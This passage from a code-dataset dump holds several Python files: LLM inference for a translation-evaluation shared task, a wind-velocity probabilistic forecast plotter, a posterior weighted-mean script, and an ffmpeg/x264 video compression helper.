df['HYP'].iloc[i]\n else:\n translation = df['TGT'].iloc[i]\n\n score = -1\n if split_type == \"train\":\n score = df['Score'].iloc[i]\n instruction = prompt_input_with_output.format(GENERAL_INSTRUCTION, text, translation, score)\n else:\n instruction = prompts_input_without_output.format(GENERAL_INSTRUCTION, text, translation)\n\n final_data.append({'text': instruction})\n\n # print(final_data[-1])\n return final_data\n\n\n\n# df = pd.read_csv(\"data/\" + dataset_name + \"/\" + dataset_name + \"_train.tsv\", delimiter = '\\t')\n# modified_df = pd.DataFrame(data = prepare_dataset(df, 'train'), columns = ['text'])\n# dataset = Dataset.from_pandas(modified_df)\n# modified_df = pd.DataFrame(data = prepare_dataset(df, 'dev'), columns = ['text'])\n# train_dataset = Dataset.from_pandas(modified_df)\n# del modified_df\n\n# df = pd.read_csv(\"data/\" + dataset_name + \"/\" + dataset_name + \"_dev.tsv\", delimiter = 
'\\t')\n# modified_df = pd.DataFrame(data = prepare_dataset(df, 'dev'), columns = ['text'])\n# dev_dataset = Dataset.from_pandas(modified_df)\n\ndf = pd.read_csv(\"data/\" + dataset_name + \"/\" + dataset_name + \"_test.tsv\", delimiter = '\\t')\nmodified_df = pd.DataFrame(data = prepare_dataset(df, 'test'), columns = ['text'])\ntest_dataset = Dataset.from_pandas(modified_df)\n\n# print(\"Train Sample: \", dataset['text'][0])\n# print(\"Train Data Sample: \", train_dataset['text'][0])\n# print(\"Dev Sample: \", dev_dataset['text'][0])\nprint(\"Test Sample: \", test_dataset['text'][0])\n\n\n### =============== Model Loading ===========================\ntokenizer = AutoTokenizer.from_pretrained(model_name, use_fast=True, trust_remote_code=True)\ntokenizer.pad_token = tokenizer.eos_token\n\nbnb_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_quant_type=\"nf4\",\n bnb_4bit_compute_dtype=torch.float16,\n device_map = \"auto\"\n)\n\nmodel = AutoModelForCausalLM.from_pretrained(\n model_name,\n quantization_config=bnb_config,\n trust_remote_code=True,\n)\nmodel.config.use_cache = False\nmodel.eval()\n\n### ==================== Inference ========================================\nfinal_outputs = []\n\nstart = 0\nend = len(test_dataset)\n\nfor i in tqdm(range(start, end)):\n instruction = test_dataset['text'][i]\n\n try:\n inputs = tokenizer(instruction, return_tensors=\"pt\").to(device)\n\n outputs = model.generate(**inputs, max_new_tokens=512)\n predicted_output = tokenizer.decode(outputs[0], skip_special_tokens=True)\n\n final_output = predicted_output.split('### Response:', 1)[1].strip().replace('```', '')\n\n # print(\"Predicted Output: \", predicted_output)\n # print(\"Final Output: \", final_output)\n final_outputs.append({'Index': str(i+1), 'Output': final_output})\n\n except Exception as e:\n print(e)\n final_outputs.append({'Index': str(i+1), 'Output': predicted_output})\n\ndf = pd.DataFrame(data = final_outputs, columns = ['Index', 'Output'])\nprint(df.shape)\nprint(df.head())\ndf.to_csv('output.csv', sep='\\t')","repo_name":"pavanbaswani/Eval4NLP_SharedTask","sub_path":"eval4nlp_mt.py","file_name":"eval4nlp_mt.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43530425305","text":"#!/usr/bin/python3\r\n\r\nimport sys\r\nfrom importlib import import_module\r\nimport numpy as np\r\nimport scipy.optimize as op\r\nimport tensorflow as tf\r\nimport JTNet\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nimport pickle\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nsys.path.insert(0,\".\")\r\nnp.seterr(divide=\"raise\", over=\"raise\", invalid=\"raise\")\r\n\r\n############## Job Control ##################################\r\n#\r\n# Defaults, changed by FWV_job.py\r\n#\r\njobctl_0 = {\r\n \"tf_chk_path\": None,\r\n \"tracker_jobctl\": None,\r\n \"data_path\": None,\r\n \"norm_filename\": None,\r\n \"val\": 5101,\r\n \"nsamp\": 40,\r\n \"contours\" : [0.683, 0.954],\r\n \"cont_plot_stem\": \"pcontour_\",\r\n \"speed_plot_stem\": \"wspeed_\",\r\n \"axis_labels\": [\"E-W Wind Vel. (m s$^{-1}$)\", \"N-S Wind Vel. 
(m s$^{-1}$)\"],\r\n \"simplex_scale\": 0.5,\r\n \"xdomain\" : (-7.0,4.0),\r\n \"ydomain\" : (-10.0, 1.0),\r\n \"ll_min\" : None,\r\n \"smax\": 15.0,\r\n \"s_samp\": 100,\r\n \"cplot_title\": \"3-Hour Delay Wind Velocity Forecast:\\n Colormap is Log Probability Density\",\r\n \"splot_title\": \"3-Hour Delay Wind Speed Forecast\",\r\n}\r\n\r\nfrom FWV_job import jobctl\r\njobctl_0.update(jobctl)\r\nglobals().update(jobctl_0)\r\n\r\njt = import_module(tracker_jobctl)\r\nglobals().update(jt.jobctl)\r\n\r\n################################################################\r\n\r\nwith open(norm_filename,'rb') as f:\r\n scaler = pickle.load(f)\r\n\r\n##########################\r\n# Some data management\r\n##########################\r\ndef readnpfile(data_file):\r\n data = np.load(data_file)\r\n if hasattr(data, \"files\"): # .npz file, assume first \"file\" is the data\r\n return data[data.files[0]]\r\n data.close()\r\n else:\r\n return data\r\n\r\ndatavectors = readnpfile(data_file)\r\nvecsize = datavectors.shape[1]\r\n\r\ns0max = datavectors[:,0].max() ; s0min = datavectors[:,0].min()\r\ns1max = datavectors[:,1].max() ; s1min = datavectors[:,1].min()\r\ns0 = s0max - s0min ; s1 = s1max - s1min\r\n\r\n##########################\r\n# Build the JTNN\r\n##########################\r\njtp = JTNet.jtprob(vecsize, layers, penalty=penalty_const)\r\ninit = tf.global_variables_initializer()\r\nsaver = tf.train.Saver()\r\n\r\n##########################\r\n# Log density function wrapper\r\n##########################\r\nsess = 0 # Will be set to tf.Session() later\r\nmul = 1.0 # During optimization change this to -1.0\r\nX = tf.placeholder(tf.float64, shape=(None, vecsize), name=\"X\")\r\nlpt = jtp.logprob(X)\r\ndef logprob(data_2d):\r\n # data_2d should have either shape (:,2) or (2)\r\n\r\n s2d = data_2d.shape\r\n if len(s2d) == 1:\r\n x = datavectors[val].reshape((1, vecsize)).copy()\r\n x[0,0:2] = data_2d[:]\r\n else:\r\n x = np.zeros((s2d[0],vecsize), dtype=np.float64)\r\n x[:,:] = datavectors[val].copy()\r\n x[:,0:2] = data_2d[:,:]\r\n \r\n x = scaler.transform(x)\r\n lp = sess.run(lpt, feed_dict={X: x})\r\n\r\n if len(s2d) == 1:\r\n lp = lp[0]\r\n \r\n return mul*lp\r\n\r\n####################\r\n# OK, let's go\r\n####################\r\nprint(datavectors[val])\r\nwith tf.Session() as sess:\r\n saver.restore(sess, tf_chk_path)\r\n\r\n ## Find optimum predicted wind vector\r\n mul = -1.0\r\n v0 = datavectors[val, :2] # Initial guess is true value, cheating, I know, but harmless\r\n init_splx = np.zeros((3,2))\r\n init_splx[0] = v0\r\n init_splx[1] = v0 + np.array([s0*simplex_scale, 0])\r\n init_splx[2] = v0 + np.array([0, s1*simplex_scale])\r\n res = op.minimize(logprob, v0, method=\"Nelder-Mead\", \r\n options={'initial_simplex':init_splx, 'disp': True})\r\n print(res)\r\n v_opt = res.x\r\n lp_opt = -res.fun # this is the mode of the distribution?\r\n\r\n mul = 1.0\r\n ## Calculate grid of normalized probability densities\r\n # d0ctr = 0.5*(s0max+s0min) ; d1ctr = 0.5*(s1max+s1min)\r\n # d0hwid = 0.5*(s0max-s0min)*domain_scale ; d1hwid = 0.5*(s1max-s1min)*domain_scale\r\n # d0lo = d0ctr - d0hwid ; d0hi = d0ctr + d0hwid\r\n # d1lo = d1ctr - d1hwid ; d1hi = d1ctr + d1hwid\r\n # v0pts = np.linspace(d0lo, d0hi, nsamp, dtype=np.float64)\r\n # v1pts = np.linspace(d1lo, d1hi, nsamp, dtype=np.float64)\r\n v0pts = np.linspace(xdomain[0], xdomain[1], nsamp, dtype=np.float64)\r\n v1pts = np.linspace(ydomain[0], ydomain[1], nsamp, dtype=np.float64)\r\n cellarea = (v0pts[1]-v0pts[0]) * (v1pts[1] - v1pts[0])\r\n V0, 
V1 =np.meshgrid(v0pts, v1pts, indexing=\"ij\")\r\n Vgrid = np.stack([V0,V1], axis=-1).reshape((-1,2))\r\n ldengrid = logprob(Vgrid).reshape((nsamp,nsamp))\r\n Pgrid = np.exp(ldengrid - lp_opt)\r\n Norm = Pgrid.sum() * cellarea\r\n Pgrid = Pgrid / Norm\r\n\r\nprint(datavectors[val])\r\n\r\n## Calculate densities at requested contours\r\ncontours = np.array(contours)\r\ncontours.sort()\r\nclevs = []\r\nSP = Pgrid.flatten()\r\nSP.sort()\r\nSP = np.flip(SP)\r\ncdf = 0.0\r\ni=0\r\nic = 0\r\nfor c in contours:\r\n while cdf < c:\r\n cdf += SP[i]*cellarea\r\n i += 1\r\n clevs.append(SP[i])\r\nclevs = np.flip(np.array(clevs))\r\n\r\n## Calculate wind speed density\r\ns_true = np.sqrt(datavectors[val,0]**2 + datavectors[val,1]**2)\r\ndels = smax / s_samp\r\nsarr = (np.arange(s_samp, dtype=np.float64) + 0.5) * dels\r\nwspeed_2d = np.sqrt(V0**2+V1**2)\r\nspden = np.zeros(s_samp)\r\nfor isamp in range(s_samp):\r\n vlo = sarr[isamp] - 0.5*dels\r\n vhi = sarr[isamp] + 0.5*dels\r\n spden[isamp] = Pgrid[np.logical_and(wspeed_2d > vlo, wspeed_2d <= vhi)].sum()\r\nnorm = spden.sum()*dels\r\nspden = spden / norm\r\n\r\n## Contour plot\r\nplotname = cont_plot_stem + \"%i.png\" % val\r\n\r\nfig = plt.figure()\r\nfig.set_figwidth(10.0)\r\nfig.set_figheight(10.0)\r\nax = fig.add_subplot(1,1,1)\r\nplt.axes().set_aspect('equal', 'box')\r\n\r\np = ax.pcolormesh(V0, V1, ldengrid, cmap=cm.RdYlGn, vmin=ll_min)\r\nfig.colorbar(p)\r\n\r\np = ax.contour(V0, V1, Pgrid, levels=clevs, colors=\"blue\")\r\np.levels = np.flip(contours*100)\r\nax.clabel(p, fontsize=14, fmt=\"%3.1f%%\")\r\ntrue = ax.plot(datavectors[val,0], datavectors[val, 1], \"r*\", markersize=15.0, label = \"3-Hr Delayed Observation\")\r\nmp = ax.plot(v_opt[0], v_opt[1], \"b+\", markersize=15.0, label=\"MAP Estimate\")\r\nax.legend()\r\nax.set_xlabel(axis_labels[0],fontsize=14) ; ax.set_ylabel(axis_labels[1], fontsize=14)\r\nax.set_title(cplot_title, fontsize=14)\r\n\r\nfig.savefig(plotname, format=\"png\")\r\nfig.clf()\r\n\r\n# Windspeed probability distribution\r\nplotname = speed_plot_stem + \"%i.png\" % val\r\n\r\nax = fig.add_subplot(1,1,1)\r\nax.plot(sarr, spden, \"b-\")\r\nax.set_xlabel(\"Wind Speed (m s$^{-1}$)\", fontsize=14)\r\nax.set_ylabel(\"Probability Density\", fontsize=14)\r\nax.set_title(splot_title, fontsize=14)\r\nax.axvline(s_true, color=\"green\", linewidth=3, label=\"3-Hr Delayed Observation\")\r\nax.legend(fontsize=14)\r\nfig.savefig(plotname, format=\"png\")\r\n\r\nplt.close()\r\n","repo_name":"rittlern/probabilistic_forecasting","sub_path":"forecasting_code/Forecasting/Verification/Forecast_WindVel.py","file_name":"Forecast_WindVel.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"27292842786","text":"from pylab import *\n\nf1 = open('posterior_points')\nX = []\nY = []\nW = []\ntemp = str()\n\nfor line in f1:\n if line[0] == '[':\n temp = line.strip()\n else:\n temp = temp +' '+ line.strip()\n \n if temp[-1] == ']':\n temp = temp[1:-1]\n temp = array(temp.split(),dtype=float)\n X.append(temp)\n temp = str()\nf1.close()\n\nf2 = open('posterior_weights')\n\nfor line in f2:\n W.append(float(line))\nf2.close()\n\nX = array(X)\nW = array(W)\n\nweighted_mean = mean(X.T*W,1)*(len(W)/sum(W))\n\nf3 = open('weighted_mean_142','w+')\nfor i in weighted_mean:\n 
f3.write(str(i)+'\\n')\nf3.close()","repo_name":"EdBoone/MarineEco","sub_path":"PythonCode/processing_post.py","file_name":"processing_post.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39401337262","text":"import os,subprocess\nimport random,json,re\nimport time\nfrom threading import Thread\n\n\n'''\n依赖:\ncompress:ffmpeg,x264\ndash:mp4fragment,mp4dash\n考虑:\nvcodec,acodec,vbr,abr,width,height\n1.h264,aac OK\nvbr,abr在合理范围内,直接resize,音频copy\n2.abr>标准\n直接压缩音频\n直接使用ffmpeg\n=====\n3.分离音视频,启用x264,压缩视频,压缩音频if\n合并\n'''\n\nclass Mp4(object):\n\tdef __init__(self,media , sizes=None , vbrUppers=None, abrUpper=131584, brLower=600000 , heightLower = 480,stdoutCb=None,stderrCb=None):\n\t\tself.media = media\n\t\tself.sizes = sizes\n\t\tself.vbrUppers = vbrUppers\n\t\tif vbrUppers :\n\t\t\tself.vbrUppersList = sorted(list(vbrUppers.items()) ,reverse=True )\n\t\tself.abrUpper = abrUpper\n\t\tself.brLower = brLower\n\t\tself.heightLower =heightLower\n\t\tself.stdoutCbRaw = stdoutCb\n\t\tself.stderrCbRaw = stderrCb\n\t\tself.result= {}\n\t\tself.lastLine = \"\"\n\t\tself.init()\n\tdef init(self):\n\t\tself.streams,self.format = getVideoInfo(self.media)\n\t\t# print(self.streams)\n\t\t# print(self.format)\n\t\t# print(self.streams['video'],self.format)\n\t\t\n\t\tself.dirpath , self.fileName = os.path.split(self.media)\n\t\tself.name,self.ext = os.path.splitext(self.fileName)\n\t\tself.fileWithoutExt =os.path.join(self.dirpath , self.name)\n\t\tself.ext = self.ext.lower()\n\n\t\tself.aac = self.fileWithoutExt+\".aac\"\n\t\tself.wav = \"\"\n\n\t\tself.height = int(self.streams['video']['height'])\n\t\tself.width = int(self.streams['video']['width'])\n\t\tself.br = int(self.format['bit_rate'])\n\t\tself.vbr = int(self.streams['video']['bit_rate'])\n\t\tself.abr = int(self.streams['audio']['bit_rate'])\n\t\tself.fileSize = int(self.format['size'])\n\t\tself.duration = float(self.format['duration'])\n\t\tself.vcodec = self.streams['video']['codec_name']\n\t\tself.acodec = self.streams['audio']['codec_name']\n\t\tv = self.streams['video']\n\t\tif 'nb_frames' in v:\n\t\t\tself.nb_frames = int(v['nb_frames'])\n\t\telse :\n\t\t\tif 'avg_frame_rate' in v:\n\t\t\t\tfri = v['avg_frame_rate'].find(\"/\")\n\t\t\t\tself.nb_frames = int(self.duration)*int(v['avg_frame_rate'][0:fri])\n\t\t\telse:\n\t\t\t\tself.nb_frames = int(self.duration)*25\n\t\tself.setHeight()\n\t\tself.setProgresses()\n\t\tself.progressIndex = 0\n\t\tself.progress = 0\n\t\tself.stdoutCb = self.stdoutCbWrap\n\t\tself.stderrCb = self.stderrCbWrap\n\n\n\tdef isH264(self):\n\t\treturn 'h264' == self.streams['video']['codec_name']\n\tdef isAac(self):\n\t\treturn 'aac' == self.streams['audio']['codec_name']\n\tdef videoNeedResize(self):\n\t\treturn int(self.streams['video']['width']) > self.heightLower\n\tdef audioNeedCompress(self):\n\t\treturn int(self.streams['audio']['bit_rate']) > self.abrUpper\n\t# def videoNeedCompress(self , i ):\n\t# \treturn int(self.streams['video']['bit_rate']) > self.sizesVideoBrLower[i]\n\n\tdef getAcc(self,nero=False):\n\t\tif self.isAac():\n\t\t\tcmd = \"ffmpeg -i {media} -vn -y \"\n\t\t\tif self.audioNeedCompress() :\n\t\t\t\tcmd += \" -acodec aac -vbr 3 -ab \"+str(self.abrUpper)+\" {aac}\"\n\t\t\telse :\n\t\t\t\tcmd += \" -acodec copy \"\n\t\t\tcmd += \" {aac}\"\n\t\t\trunCb(cmd.format(media=self.media,aac=self.aac) ,self.stdoutCb, self.stderrCb)\n\t\telse:\n\t\t\tif not nero :\n\t\t\t\tcmd = \"ffmpeg -i {media} -vn 
-y -acodec aac -vbr 3 {aac}\"\n\t\t\t\trunCb(cmd.format(media=self.media,aac=self.aac) ,self.stdoutCb, self.stderrCb)\n\t\t\telse :\n\t\t\t\tself.wav = self.fileWithoutExt+\".wav\"\n\t\t\t\tcmd1 = 'ffmpeg -i {media} -vn -c:a pcm_s16le -y -f wav {wav}'\n\t\t\t\tcmd2 = 'neroAacEnc -q 0.8 -ignorelength -2pass -if {wav} -of {aac}'\n\t\t\t\trunCb(cmd.format(media=self.media,aac=self.aac) ,self.stdoutCb, self.stderrCb)\n\t# def filterSizes(self):\n\t# \tresizes =[]\n\t# \tfor size in self.sizes :\n\t# \t\tif size[1] < self.height :\n\t# \t\t\tresizes.append(size)\n\t# \tif len(resizes) == 0:\n\t# \t\tresizes.append([self.width ,self.height])\n\t# \tif self.height > resizes[0][1] :\n\t# \t\tresizes.insert(0,[self.width ,self.height])\n\t# \treturn resizes\n\tdef vbrOk(self):\n\t\tif not self.vbrUppers or len(self.vbrUppers) <=0 :\n\t\t\treturn False\n\t\tups = list(self.vbrUppers.items())\n\t\tups.sort()\n\t\tups = list(reversed(ups))\n\t\tif self.height > ups[0][0] :\n\t\t\treturn self.vbr <= ups[0][1]\n\t\tfor i in ups :\n\t\t\tif self.height >= i[0]:\n\t\t\t\treturn self.vbr<= i[1] * (self.height/i[0]) * 1.2\n\t\treturn self.vbr <= ups[-1][1]\n\tdef preprocess(self):\n\t\tif self.ext.lower() == \".mov\":\n\t\t\ttoMp4(self.media , self.streams,self.stdoutCb,self.stderrCb)\n\t\t\tself.media = self.fileWithoutExt+\".mp4\"\n\t\t\tself.init()\n\tdef compress(self):\n\t\t# vbr is ok ,quick compress\n\t\tif self.vbrOk():\n\t\t\tqr = self.quickCompress()\n\t\t\tif qr is not None:\n\t\t\t\tself.progress = 100\n\t\t\t\treturn qr\n\t\t# other ,split media into video and audio\n\t\t# video -x264-> mkvs \n\t\t# audio -aac-> aac \n\t\t# merge into mp4s\n\n\t\t\n\t\tself.preprocess()\n\t\tvideoSuffix = \".mkv\"\n\t\tr = []\n\t\tself.getAcc()\n\t\ttmpVideos= []\n\t\tif self.sizes and len(self.sizes)>0 :\n\t\t\tcurVideo = self.media\n\t\t\tfor i, size in enumerate(self.sizes):\n\t\t\t\tself.progressIndex = i\n\t\t\t\tmp4Video = self.fileWithoutExt+\"_tmp_\"+formatSize(size)+videoSuffix\n\t\t\t\tx264Compress(curVideo,mp4Video,size,vbr=self.maxVbr(size[1]),stdoutCb=self.stdoutCb,stderrCb=self.stderrCb)\n\t\t\t\ttmpVideos.append(mp4Video)\n\t\t\t\tout = self.fileWithoutExt +\"_\"+str(i+1)+\".mp4\"\n\t\t\t\tmerge(mp4Video,self.aac,out)\n\t\t\t\tr.append(out)\n\t\t\t\tcurVideo = mp4Video\n\t\t\t\tself.result[size[1]] = out\n\t\telse :\n\t\t\tmp4Video = self.fileWithoutExt+\"_tmp\"+videoSuffix\n\t\t\tx264Compress(self.media,mp4Video,stdoutCb=self.stdoutCb,stderrCb=self.stderrCb)\n\t\t\ttmpVideos.append(mp4Video)\n\t\t\tout = self.fileWithoutExt +\"_1.mp4\"\n\t\t\tmerge(mp4Video,self.aac,out)\n\t\t\tr.append(out)\n\t\t\tself.result[self.height] = out\n\t\tif self.wav:\n\t\t\tos.remove(self.wav)\n\t\tif self.aac:\n\t\t\tos.remove(self.aac)\n\t\tfor v in tmpVideos:\n\t\t\tos.remove(v)\n\t\tself.progress = 100\n\t\treturn r\n\t\n\tdef maxVbr(self , height):\n\t\tif height >= self.vbrUppersList[0][0]:\n\t\t\treturn self.vbrUppersList[0][1]\n\t\tif height <= self.vbrUppersList[-1][0]:\n\t\t\treturn self.vbrUppersList[-1][1]\n\t\tfor i in self.vbrUppersList :\n\t\t\tif height >= i[0]:\n\t\t\t\treturn i[1]\n\t\treturn 0\n\tdef needCompress(self):\n\t\treturn self.height >= 1080 and self.br > 100*1024*8 \\\n\t\tor self.height < 1080 and self.height >= 720 and self.br > 60*1024*8 \\\n\t\tor self.height < 720 and self.height >= 480 and self.br > 40*1024*8 \\\n\t\tor self.height < self.br > 40*1024*8\n\n\tdef quickCompress(self):\n\t\t# if not self.videoNeedResize() and not self.audioNeedCompress():\n\t\t# return 
[toMp4(self.media,self.streams)]\n\t\t# if self.needCompress():\n\t\treturn self.mp4Resize()\n\t\t# return []\n\tdef setHeight(self ):\n\t\tif not self.sizes :\n\t\t\treturn\n\t\ths =[]\n\t\tstanardHeight = False\n\t\tfor size in self.sizes:\n\t\t\tif self.height == size[1]:\n\t\t\t\tstanardHeight = True\n\t\t\tif self.height >= size[1] :\n\t\t\t\ths.append(size)\n\t\tif not stanardHeight and len(hs)>0 and self.height> hs[0][1] :\n\t\t\ths.insert(0 ,[self.width,self.height])\n\t\tif not hs :\n\t\t\ths =[[self.width,self.height]]\n\t\tself.sizes = hs\n\n\tdef setProgresses(self):\n\t\tsizeLen = len(self.sizes)\n\t\tif sizeLen == 1:\n\t\t\tself.progresses = [100]\n\t\tif sizeLen ==2 :\n\t\t\tself.progresses = [60,40]\n\t\tif sizeLen ==3 :\n\t\t\tself.progresses = [50,30,20]\n\t\tif sizeLen ==4 :\n\t\t\tself.progresses = [45,25,20,10]\n\t\tif sizeLen ==5 :\n\t\t\tself.progresses = [45,25,15,10,5]\n\t\tif sizeLen >=6 :\n\t\t\tself.progresses = [40,20,10]\n\t\t\tfor i in range(sizeLen-3):\n\t\t\t\tself.progresses.append(30/(sizeLen-3))\n\n\tdef stdoutCbWrap(self,line):\n\t\tself.calcProgress(line)\n\t\tself.lastLine = line\n\t\tif self.stdoutCbRaw :\n\t\t\tself.stdoutCbRaw(line)\n\tdef stderrCbWrap(self,line):\n\t\tself.calcProgress(line)\n\t\tself.lastLine = line\n\t\tif self.stderrCbRaw :\n\t\t\tself.stderrCbRaw(line)\n\tdef calcProgress(self,line):\n\t\t# print(\"line:\",line)\n\t\tif not line or not hasattr(self,\"progresses\"):\n\t\t\treturn\n\t\trate = 0\n\t\tif \"frame=\" == line[0:6]:\n\t\t\t#frame= 123 fps=12\n\t\t\tend = line.find(\"fps=\")\n\t\t\tframeNo = int(line[7:end])\n\t\t\trate = frameNo / self.nb_frames\n\t\tif rate==0 and '['==line[0] :\n\t\t\t#[0.3%]\n\t\t\tm = re.match(r'^\\[(\\d*\\.\\d*)\\%\\].*', line[0:10])\n\t\t\tif m :\n\t\t\t\trate = float(m.group(1))/100\n\t\tif rate == 0 :\n\t\t\t# 123 frames\n\t\t\tm = re.match(\"^(\\d+)\\s+frames\" , line[0:20])\n\t\t\tif m :\n\t\t\t\trate = int(m.group(1))/self.nb_frames\n\t\tprogress = sum(self.progresses[0:self.progressIndex]) + self.progresses[self.progressIndex]*rate\n\t\tif progress >self.progress :\n\t\t\tself.progress = progress\n\n\tdef mp4Resize(self):\n\t\tcmd1 = 'ffmpeg -i {media} -y'\n\t\tif self.sizes:\n\t\t\tcmd1 += ' -s {size}'\n\t\tcmd2 = cmd1 +' {output}'\n\t\t# if not self.isAac():\n\t\t# \tcmd1 += \" -acodec aac\"\n\t\tif self.audioNeedCompress() :\n\t\t\tcmd1 += \" -acodec aac -vbr 3 -ab \"+str(self.abrUpper)\n\t\telse :\n\t\t\tcmd1 += \" -acodec copy \"\n\t\t# else :\n\t\t# \tcmd1 += \" -acodec copy\"\n\t\tif not self.isH264():\n\t\t\tcmd1 += \" -vcodec h264\"\n\t\telse :\n\t\t\tcmd1 += \" -vcodec copy\"\n\t\tcmd1 += ' {output}'\n\t\tcmd2 = cmd1\n\t\tr = []\n\t\tif self.sizes is not None:\n\t\t\t# print(\"sizes:\",self.sizes , self.height)\n\t\t\tcur = self.media\n\t\t\tfor i,size in enumerate(self.sizes):\n\t\t\t\tself.progressIndex = i\n\t\t\t\tif size[1] >= self.height and self.ext==\".mp4\":\n\t\t\t\t\tif size[1] == self.height:\n\t\t\t\t\t\tr.append(self.media)\n\t\t\t\t\t\tself.result[size[1]] = self.media\n\t\t\t\t\tcontinue\n\t\t\t\toutput = self.fileWithoutExt+\"_\"+str(i+1)+\".mp4\"\n\t\t\t\tif i ==0:\n\t\t\t\t\trunCb(cmd1.format(media=cur,size=formatSize(size) , output=output) ,self.stdoutCb, self.stderrCb)\n\t\t\t\telse :\n\t\t\t\t\trunCb(cmd2.format(media=cur,size=formatSize(size) , output=output) ,self.stdoutCb, self.stderrCb)\n\t\t\t\tcur = output\n\t\t\t\tr.append(output)\n\t\t\t\tself.result[size[1]] = output\n\t\telse :\n\t\t\toutput = 
self.fileWithoutExt+\"_1.mp4\"\n\t\t\trunCb(cmd1.format(media=self.media , output=output) ,self.stdoutCb, self.stderrCb)\n\t\t\tr.append(output)\n\t\t\tself.result[self.height] = output\n\t\treturn r\n\n\tdef dash(self , *mp4s):\n\t\tout = self.name+\".mpd\"\n\t\tdash(self.dirpath , out , *mp4s)\n\t\tself.result[\"mpd\"] = os.path.join(self.dirpath , out)\n\n\tdef compressDash(self):\n\t\tself.dash(*self.compress())\n\n\tdef isMp4(self):\n\t\treturn self.isH264() and self.isAac() and self.format['format_name'].lower().find(\"mp4\")!=-1\n\tdef toMp4(self):\n\t\tr = self.media\n\t\tif not self.isMp4():\n\t\t\tr = toMp4(self.media,self.streams,self.stdoutCb,self.stderrCb)\n\t\tself.result[\"mp4\"] = r\n\t\treturn r\n\tdef snapshot(self , n):\n\t\tv = self.result.get(720)\n\t\tif not v :\n\t\t\tv = self.result.get(self.sizes[-1][1])\n\t\tif not v :\n\t\t\treturn\n\t\t\t\n\t\tfor i in range(1,n+1) :\n\t\t\timg = os.path.join(self.dirpath , self.name+str(i)+\".jpg\")\n\t\t\tsnapshot(v , img , random.randint(0,int(self.duration)))\n\t\t\tself.result[\"capture\"+str(i)] =img\n\tdef captureMp4(self , n):\n\t\tv = self.result[\"mp4\"]\n\t\tif not v :\n\t\t\treturn\n\t\t\t\n\t\tfor i in range(1,n+1) :\n\t\t\timg = os.path.join(self.dirpath , self.name+str(i)+\".jpg\")\n\t\t\tsnapshot(v , img , random.randint(0,int(self.duration)))\n\t\t\tself.result[\"capture\"+str(i)] =img\n\n\tdef getResultRaw(self):\n\t\tfor k in self.result :\n\t\t\tif k == self.height:\n\t\t\t\treturn self.result[k]\n\t\treturn None\n\n\tdef isResultOk(self):\n\t\tfor k in self.result :\n\t\t\tif isinstance(k , int) and self.result[k]:\n\t\t\t\tif not os.path.exists(self.result[k]) :\n\t\t\t\t\treturn False\n\t\treturn True\n\n\ndef getVideoInfo(media):\n\tprob='ffprobe -v quiet -print_format json -show_format -show_streams {}'\n\tc = prob.format(media)\n\tstate, stdout,stderr = run(c)\n\tvideo_info = json.loads(stdout)\n\tstreams = {s['codec_type'] : s for s in video_info['streams']}\n\tformat = video_info['format']\n\n\treturn streams,format\n\ndef printVideoInfo(media):\n\tprob='ffprobe -v quiet -show_format -show_streams {}'\n\tc = prob.format(media)\n\tstate, stdout,stderr = run(c)\n\treturn stdout,state\n\n\ndef readStream(stream , cb=None) :\n\tline = ''\n\twhile True :\n\t\tb = stream.read(1)\n\t\tif not b :\n\t\t\tif cb :\n\t\t\t\tcb(line)\n\t\t\tbreak\n\t\tif '\\r' == b or '\\n' ==b :\n\t\t\t# output.append(line.strip())\n\t\t\tif cb :\n\t\t\t\tcb(line)\n\t\t\tline = ''\n\t\t\tcontinue\n\t\tline +=b\n\n\ndef runCb(cmd , stdoutCb=None , stderrCb=None, timeout=None,throwError=True,cwd=None,cmdStrCb=None) :\n\t'''execute cmd callback stdout,stderr line by line\n\t'''\n\tcmd = cmd\n\tif cmdStrCb:\n\t\tcmdStrCb(cmd)\n\tprint(\"run:\"+cmd)\n\tp = subprocess.Popen(cmd,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE , universal_newlines=True ,shell=True,cwd=cwd)\n\t# stdout = []\n\t# stderr = []\n\tstdoutThread = Thread(target=readStream,daemon=False,args=(p.stdout,stdoutCb))\n\tstderrThread = Thread(target=readStream,daemon=False,args=(p.stderr,stderrCb))\n\t\n\tstdoutThread.start()\n\tstderrThread.start()\n\tstate =0\n\t# try :\n\tstate = p.wait(timeout=timeout) \n\tif state!=0 and throwError:\n\t\traise(Exception('Execute cmd:\"'+cmd+'\" failed. 
state:'+str(state)))\n\t# except:\n\t# \treturn state\n\tstdoutThread.join()\n\tstderrThread.join()\n\treturn state\n\n\ndef run(cmd,throwError=True, cwd=None):\n\tstdout ,stderr = [],[]\n\tstate = runCb(cmd,lambda l:stdout.append(l) , lambda l:stderr.append(l) , throwError=throwError,cwd=cwd)\n\treturn state ,'\\n'.join(stdout) , '\\n'.join(stderr)\n\ndef appendFileName(filename , s):\n\ti = filename.rfind('.')\n\tif -1==i :\n\t\treturn filename+s\n\treturn filename[0:i]+s+filename[i:]\ndef formatSize(size):\n\tif len(size)<1:\n\t\treturn \"\"\n\tif len(size)<2:\n\t\treturn size[0]+\"\"\n\treturn str(size[0])+\"x\"+str(size[1])\n\ndef x264CopyResize(media , output ,size,stdoutCb=None,stderrCb=None):\n\tcmd = 'ffmpeg -i {media} -y -an -s {size} {output}'\n\tc = cmd.format(media=media , output=output , size=formatSize(size))\n\trunCb(c, stdoutCb,stderrCb)\ndef x264Compress(media,video,size=None,vbr = 0,stdoutCb=None,stderrCb=None):\n\tcmd = 'x264 --threads auto --crf 26 --preset 6 --subme 10 --ref 9 --bframes 14 --b-adapt 2 --qcomp 0.55 --psy-rd 0:0 --keyint 360 --min-keyint 1 --aq-strength 0.9 --aq-mode 3'\n\tif vbr >0 :\n\t\tcmd += \" -B \"+str(vbr//1024)\n\tcmd +=' -o {video} {media}'\n\t# cmd='x264 --threads auto --crf 26 --preset medium --me umh --tune film -o {video} {media}'\n\t# --vf 